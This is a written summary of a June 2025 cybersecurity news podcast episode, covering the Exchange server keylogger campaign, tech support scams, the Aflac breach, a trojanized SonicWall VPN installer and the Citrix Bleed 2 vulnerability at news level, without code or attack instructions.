Detailed Summary of "Cyber Security Headlines" Episode 70 by CISO Series

Release Date: June 25, 2025
Host: Sarah Lane

1. Microsoft Exchange Servers Targeted by Keyloggers

At the outset of the episode, Sarah Lane highlights a concerning trend where over 70 publicly exposed Microsoft Exchange servers have been compromised by unidentified attackers. These adversaries have been injecting JavaScript-based keyloggers into the login pages of these servers to illicitly capture user credentials. Lane reports:

"Unidentified attackers are targeting over 70 publicly exposed Microsoft Exchange servers by injecting JavaScript based keyloggers into login pages to steal credentials." [00:07]

The campaign, as detailed by Positive Technologies, spans 26 countries and exploits known vulnerabilities like ProxyShell and ProxyLogon, with some of the attacks dating back to 2021. The sophistication of this operation is underscored by the diverse exfiltration methods employed, including local file storage, Telegram bots, and DNS tunnels, which collectively make the detection of such breaches notably challenging. The captured credentials and user data are transmitted in plain text, exacerbating the security risks associated with these breaches.

2. Apple, Netflix, and Microsoft Sites Hacked for Tech Support Scams

Sarah Lane shifts focus to a prevalent scam strategy targeting major tech companies. Tech support scammers have been exploiting Google Ads and search parameter injection to display fake support phone numbers on legitimate websites belonging to Apple, Microsoft, and Netflix. Instead of creating spoofed websites, these attackers cleverly manipulate URLs on real support pages to present fraudulent contact information within search results. Lane explains:

"Instead of spoofing websites, the attackers link to real support Pages with manipulated URLs that show scammer numbers in search results, tricking users into calling them." [00:07]

Once users engage with these fraudulent contacts, the scammers' objectives include stealing personal data, payment information, or even gaining remote access to victims' devices, thereby posing significant threats to individual and organizational cybersecurity.

3. Cloudflare, CrowdStrike, and Ping Identity Conclude Critical Infrastructure Defense Project

The episode touches on the cessation of a pivotal cybersecurity initiative. Cloudflare, CrowdStrike, and Ping Identity have terminated their free critical infrastructure defense project, which was launched in 2022. This project aimed to safeguard sectors deemed potential targets of Russia-linked cyber threats, such as healthcare and utilities. Lane notes:

"Cloudflare, CrowdStrike and Ping Identity have ended their free critical infrastructure defense project, originally launched in 2022 to protect sectors like health care and utilities from Russia linked cyber threats." [00:07]

This shutdown coincides with warnings from the Department of Homeland Security (DHS) about potential retaliation from Iranian hackers against U.S. networks, especially following recent U.S. strikes on Iran's nuclear sites. The associated NTAS bulletin further emphasizes the escalating risks of cyber and physical attacks from Iranian-aligned actors and extremist groups, highlighting the dynamic and evolving nature of cyber threats.

4. File Fix Attack: Weaponizing Windows File Explorer for Stealthy Commands

A novel threat named File Fix has emerged, as detailed by Lane. This attack variant manipulates the Windows File Explorer to execute stealthy commands by tricking users into pasting malicious PowerShell commands into the address bar. Unlike previous click-fix attacks that relied on the run dialog, File Fix leverages a familiar user interface, disguising the malicious commands behind fake file paths. Lane elaborates:

"File Fix uses a familiar UI and disguises the command behind a fake file path likely to be adopted by threat actors due to simplicity and ability to evade detection." [00:07]

This method's simplicity and effectiveness in evading detection make it an attractive tactic for threat actors seeking to execute commands without raising immediate alarms.

5. Aflac Suffers Data Breach Exposing Sensitive Customer Information

One of the significant breaches discussed is the data compromise faced by Aflac, a leading U.S. insurer. The breach potentially exposed Social Security numbers, health data, and other sensitive customer information. Lane reports:

"Aflac, one of the largest US insurers, is investigating a data breach that may have exposed Social Security numbers, health data and other sensitive customer information." [00:07]

The attack is believed to be orchestrated by the group Scattered Spider, known for employing low-tech social engineering tactics such as impersonating employees to circumvent security measures. Despite being labeled as highly sophisticated, the breach primarily involved phishing, SIM swapping, and Multi-Factor Authentication (MFA) fatigue, rather than advanced technical exploits.

6. Russian Court Sentences REvil Ransomware Members Amidst Cybersecurity Tensions

In a notable development, a Russian court sentenced four members of the REvil ransomware group for trafficking stolen U.S. payment card data. However, these individuals were released immediately, having served time in pretrial detention. Lane provides context:

"A Russian court sentenced four REvil ransomware members for trafficking stolen U.S. payment card data, but released them immediately, citing time served in pretrial detention." [00:07]

This case is particularly significant as it is one of the rare instances where Russia has prosecuted its own hackers. The likely impetus for this action stems from U.S. pressure dating back to 2021. Notably, the case was not linked to REvil's major ransomware attacks, distinguishing it from the group's more infamous cybercriminal activities.

7. Threat Actors Trojanize SonicWall Net Extender VPN App to Steal Credentials

The episode warns of a new threat involving the trojanization of the SonicWall Net Extender VPN application. Attackers have been distributing malicious versions of this VPN client designed to steal user credentials and VPN configuration data. Lane explains:

"A threat actor distributed a trojanized version of SonicWall's Net Extender VPN app designed to steal user credentials and VPN configuration data." [00:07]

The malicious installer was signed by a suspicious entity and hosted on attacker-controlled sites, deceiving users seeking the legitimate application. In response, SonicWall and Microsoft have mitigated the threat by revoking the fake certificate and urging users to only download software from official sources, thereby minimizing the risk of further compromises.

8. Citrix Bleed 2 Vulnerability Poses Significant Security Risks

Concluding the episode, Lane discusses the newly patched Citrix Bleed 2 vulnerability, which affects NetScaler, ADC, and Gateway products. This critical flaw allows unauthenticated attackers to access sensitive memory data, including session tokens. She states:

"Citrix has patched a critical vulnerability dubbed Citrix Bleed 2, affecting Netscaler, ADC and Gateway products, which could allow unauthenticated attackers to access sensitive memory data like session tokens." [00:07]

The Citrix Bleed 2 vulnerability mirrors the original Citrix Bleed, which was heavily exploited by ransomware groups. Experts warn that it is only a matter of time before the new flaw becomes a target for similar malicious activities. Citrix has urged immediate patching and the execution of session killing commands to mitigate the associated threats, especially in light of the updated CVE descriptions that suggest the risk is more severe than initially disclosed.

This comprehensive summary encapsulates the critical discussions and insights presented in Episode 70 of the Cyber Security Headlines by the CISO Series. For detailed explorations of each headline and ongoing cybersecurity trends, listeners are encouraged to visit CISOseries.com.